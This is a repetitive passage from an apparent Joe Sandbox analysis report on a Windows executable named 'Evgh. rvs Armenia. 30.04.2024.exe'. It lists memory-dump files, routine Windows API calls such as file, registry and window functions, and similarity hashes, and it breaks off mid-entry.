                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitialize
                                                  • String ID:
                                                  • API String ID: 2896919175-0
                                                  • Opcode ID: d3b6dbed7c397c7d965c7b5dc9da2b27708715bb4eb5028dd1fcf91096d05334
                                                  • Instruction ID: 5c307a7216673bc61f70b616c35f5055657c704e5bc639d6389db7f9009c9d2b
                                                  • Opcode Fuzzy Hash: d3b6dbed7c397c7d965c7b5dc9da2b27708715bb4eb5028dd1fcf91096d05334
                                                  • Instruction Fuzzy Hash: B3F0F0FAA00601BADB605F119C00B1B77B4DBD0746F10803AFE44A22A0D73998428AAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ShowWindow.USER32(0001047E), ref: 00401579
                                                  • ShowWindow.USER32(00010476), ref: 0040158E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: 9dbd9b7718999257957ecf96969e76a3a03f192157de06d7b0b0cd9deed0d964
                                                  • Instruction ID: 7a448c7715a17160088acb1a6ba8cb9818a258c7baefa7eb8fde05be1467c36a
                                                  • Opcode Fuzzy Hash: 9dbd9b7718999257957ecf96969e76a3a03f192157de06d7b0b0cd9deed0d964
                                                  • Instruction Fuzzy Hash: A7E04F76B10104ABDB14EBA4EE8086E77A7E794310360447BD202B3694C2B89D459A68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                    • Part of subcall function 00406028: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                    • Part of subcall function 00406028: wsprintfA.USER32 ref: 00406078
                                                    • Part of subcall function 00406028: LoadLibraryA.KERNELBASE(?), ref: 00406088
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 9d06168268301413df58d073caad4fe4514c6b8c3f7d40560c439a7b978b8ec9
                                                  • Instruction ID: 774eb21b39d2aab2af5da2aca531c8e6d79f2737565152ed1a094a03d1eb9b6f
                                                  • Opcode Fuzzy Hash: 9d06168268301413df58d073caad4fe4514c6b8c3f7d40560c439a7b978b8ec9
                                                  • Instruction Fuzzy Hash: 28E0863254411166D610E7705D0487773AC9F84711302883EF942F2150D734AC26A669
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,80000000,00000003), ref: 00405974
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405996
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: afccfa4f4cb9885f70129b38e82a9c897481b005b6ad677f4785abde6c99dd13
                                                  • Instruction ID: f6a7e9eb3deff2eb260b804c641ce7d3451857e515cdc874e2100240a7e6f5b1
                                                  • Opcode Fuzzy Hash: afccfa4f4cb9885f70129b38e82a9c897481b005b6ad677f4785abde6c99dd13
                                                  • Instruction Fuzzy Hash: D2D09E31658301AFEF098F20DD1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,?,00405563,?,?,00000000,00405746,?,?,?,?), ref: 00405950
                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405964
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 318c8869c664b65327b47b9f35d6847cb303a6655a32462d5bdd6235084e72f0
                                                  • Instruction ID: a0e6ef5e26ee6ddc4bb0604ab4126291559e87657aa933595c84d6ace612bc1e
                                                  • Opcode Fuzzy Hash: 318c8869c664b65327b47b9f35d6847cb303a6655a32462d5bdd6235084e72f0
                                                  • Instruction Fuzzy Hash: 9AD0C972908120EBC2102738BE0C89BBB55DB542717058B31F969B22F0C7304C56CA95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 0040545F
                                                  • GetLastError.KERNEL32 ref: 0040546D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                  • Instruction ID: c1acecc5f45fa991ae160619e34a4bf2a4a440633476f6552c0bcd7b2c81b644
                                                  • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                  • Instruction Fuzzy Hash: D3C04C30B59502DAD6105B309E08B577D54AB50742F1449756546E10E0D6349451DD2F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 0040167D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 52dd1c4c2d123aabde52000435b878d08d2c9e96ca10076c7107822555445b84
                                                  • Instruction ID: b2fa69e3c01cfbe572ec2dbf0bcaa4908bc9cb815e6a1824dfc5ffdb45a29167
                                                  • Opcode Fuzzy Hash: 52dd1c4c2d123aabde52000435b878d08d2c9e96ca10076c7107822555445b84
                                                  • Instruction Fuzzy Hash: 7CF0B435A08120ABDF20BBA58E0DE4F21A5AB6136DB34477BB112B61D1DAFD850185AF
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                  • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                  • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                  • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                  • Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
                                                  • Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                  • Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040305C,00000000,0040A8D8,00000020,0040A8D8,00000020,000000FF,00000004,00000000), ref: 00405A2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                  • Instruction ID: 26d326ee603fa64f849cef49f4367d8274c9975adadc9b0c70b30f96b952ad65
                                                  • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                  • Instruction Fuzzy Hash: 66E08C3261026AAFDF109EA18C40EEB3B6CEB04360F008432F911E2140D634EC20DFA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040308E,00000000,00000000,00402EEB,000000FF,00000004,00000000,00000000,00000000), ref: 004059FC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                  • Instruction ID: a6feee173889208d7f2b164ec0c021529dd17bfe6846c5dde0bbd097d282ac69
                                                  • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                  • Instruction Fuzzy Hash: 44E08632210219ABCF10AE519C44EEB375CFB00350F004833F915F3140D230E8519FA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 02a8e8baa5a524c01434ee569a495eb31e5a41fbc0e4972b747df59c6871b08a
                                                  • Instruction ID: c0e7c3dc5a7dcdb4abcf1ae6b2c94b9daad9c86c1f50bd1ad5aacfe77fb55035
                                                  • Opcode Fuzzy Hash: 02a8e8baa5a524c01434ee569a495eb31e5a41fbc0e4972b747df59c6871b08a
                                                  • Instruction Fuzzy Hash: F6D01D77B14100ABDB10DBA49B0895D77A5A750315B304677D201F11D0D679C5559619
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetDlgItemTextA.USER32(?,?,00000000), ref: 00403EFC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: ItemText
                                                  • String ID:
                                                  • API String ID: 3367045223-0
                                                  • Opcode ID: b8cc7b808ad147a2d347a58eef98b844e7198dc1f8f1ec02318c1053d68582be
                                                  • Instruction ID: d605ed1088b008874dde4b8a3a9fdf3530a726ea79c7fc97ea5c66f44dfad5b8
                                                  • Opcode Fuzzy Hash: b8cc7b808ad147a2d347a58eef98b844e7198dc1f8f1ec02318c1053d68582be
                                                  • Instruction Fuzzy Hash: 0DC08C31008200BFD241AB04CC06F0FB398EF90316F10C42EB15CA01D2C634C4208A3A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageA.USER32(00010470,00000000,00000000,00000000), ref: 00403F40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
